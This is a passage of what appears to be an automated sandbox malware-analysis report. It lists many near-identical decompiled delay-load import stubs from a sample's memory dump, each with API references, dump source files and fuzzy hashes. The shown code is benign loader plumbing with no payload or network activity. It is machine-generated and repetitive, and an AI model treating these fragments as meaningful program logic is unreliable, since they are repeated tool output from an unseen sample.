				E003EE85D(0x40c5ec, 0x433138); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b23585c38576cb76ce1b2e876dbec42d685877966fb31fd2c6f58f316d893e17
                • Instruction ID: d07e74df769fed7175a2478e888ca2810fe487e280eeb7d1bed2bff15fe07575
                • Opcode Fuzzy Hash: b23585c38576cb76ce1b2e876dbec42d685877966fb31fd2c6f58f316d893e17
                • Instruction Fuzzy Hash: 31B012E52591E0FC354953475C02D3B010DC0C4F23730833FF815C44C0E9946C880435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE246() {

				E003EE85D(0x40c5ec, 0x43313c); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f3cbcd868b627b26892f76331d0bea749a550011320cf4a1d87482b9141e57fc
                • Instruction ID: b000bc120d446e016872298f05d2f1d1a3067c36cd55d19e703a877f1a83f7e4
                • Opcode Fuzzy Hash: f3cbcd868b627b26892f76331d0bea749a550011320cf4a1d87482b9141e57fc
                • Instruction Fuzzy Hash: 44B012D53590E0FC350952475C02D3B010DC0C5F22730C33FFC15C44C0E954AC440435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE2B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE2B4() {

				E003EE85D(0x40c5ec, 0x433110); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f5d5fd9badcdbf2a3bc29bb1cc9e4f0ce265cedb47caf3a2bebd87dbae27fd7d
                • Instruction ID: bd7af923b2ff592c0b2fb4196e3aea01e2221d3de3e8b0923846f611d22f744d
                • Opcode Fuzzy Hash: f5d5fd9badcdbf2a3bc29bb1cc9e4f0ce265cedb47caf3a2bebd87dbae27fd7d
                • Instruction Fuzzy Hash: 2CB012D56580A0FC350952475C03D37020CC0C4F12330873FF825C44C1E9586C440435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE282() {

				E003EE85D(0x40c5ec, 0x433124); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: d07e26b15463d528af6f0e30f9bbef0aabc592ae591e59127eef9bdf5066c3ff
                • Instruction ID: 9f74c634d8f52523dc4a59f238d2249757afd69870efde98e9a376940dba381a
                • Opcode Fuzzy Hash: d07e26b15463d528af6f0e30f9bbef0aabc592ae591e59127eef9bdf5066c3ff
                • Instruction Fuzzy Hash: 4EB012E52580A0FC350992475D02D37018CC0C4F12730833FF815C44C0EE546D851435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE532 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE532() {

				E003EE85D(0x40c66c, 0x433080); // executed
				goto __eax;
			}



                0x003ee51f
                0x003ee526

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 61e680a869cd2c360adc582f1415c8f1dc17eda5c20cd2e3b23d0c7f5406894c
                • Instruction ID: 29f587d8e90a6d9dd928ce0699f8af89ede3d9c48b22857d9fbc118195301f86
                • Opcode Fuzzy Hash: 61e680a869cd2c360adc582f1415c8f1dc17eda5c20cd2e3b23d0c7f5406894c
                • Instruction Fuzzy Hash: 5CB012C5258590BD7109521A1D02E3B011CC0C6F11730973FF414C84C0E9484C040435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE50D() {

				E003EE85D(0x40c66c, 0x433090); // executed
				goto __eax;
			}



                0x003ee51f
                0x003ee526

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 150c6d71d1250d175b583336327c97362ca77812d2e1153ac838c333a66841e3
                • Instruction ID: 2e7914750855b962eea4cad700166b0ea8804292d670c96c5df12a4c6829cb67
                • Opcode Fuzzy Hash: 150c6d71d1250d175b583336327c97362ca77812d2e1153ac838c333a66841e3
                • Instruction Fuzzy Hash: 95B012C5258490BC710912361D06D3B011CC0C2F15B30973FF460D48C1A9484D080435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE546() {

				E003EE85D(0x40c66c, 0x433078); // executed
				goto __eax;
			}



                0x003ee51f
                0x003ee526

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 476f4a020e4b6613e2cb514f157f317ecd0dbf5c7342b7a89ab4fafee602dcd4
                • Instruction ID: 83a6ea68640d940c44406c3dea90bf5ad557208a1384f2dbc700e26fd0ff60fd
                • Opcode Fuzzy Hash: 476f4a020e4b6613e2cb514f157f317ecd0dbf5c7342b7a89ab4fafee602dcd4
                • Instruction Fuzzy Hash: E3B012C5258590BC7209521A5C43D3B011CC0C6F12730973FF414C44C0E9444C480439
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f460464b3a2da5bac48712a87f07d225ff5243cdf55647d96c48094eb0c76639
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: f460464b3a2da5bac48712a87f07d225ff5243cdf55647d96c48094eb0c76639
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 56720a2b97c6e59e23f6e60a2bad6bcee1418d69c377f4687a1642cb266dcce5
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 56720a2b97c6e59e23f6e60a2bad6bcee1418d69c377f4687a1642cb266dcce5
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 984827f740e7b9bcafb7ca43ff2949a15e6b6e5e263d0c9c2754e1e6f9651c58
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 984827f740e7b9bcafb7ca43ff2949a15e6b6e5e263d0c9c2754e1e6f9651c58
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 70dda076b77cb7d06d6cff03aaef4e0bb9507ba2bed842c66eb20aa482bb7076
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 70dda076b77cb7d06d6cff03aaef4e0bb9507ba2bed842c66eb20aa482bb7076
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b4e410caa687835f622c6bb240aabd2ff6f49f21402da7ceb5a59881868fd640
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: b4e410caa687835f622c6bb240aabd2ff6f49f21402da7ceb5a59881868fd640
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b57d60a81f085bb6a258068e5443f30103a202f356cce4dab33d6da7c40070b1
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: b57d60a81f085bb6a258068e5443f30103a202f356cce4dab33d6da7c40070b1
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 384e2f2caf4d03f5bf3b3cfbd8f30894f963e9d4a9cbaee5a4c87b77f4d1f56f
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 384e2f2caf4d03f5bf3b3cfbd8f30894f963e9d4a9cbaee5a4c87b77f4d1f56f
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 02733e243d0cc508a6c7534d6677465be4a22401ae0125c561edd8fa4c54661e
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 02733e243d0cc508a6c7534d6677465be4a22401ae0125c561edd8fa4c54661e
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

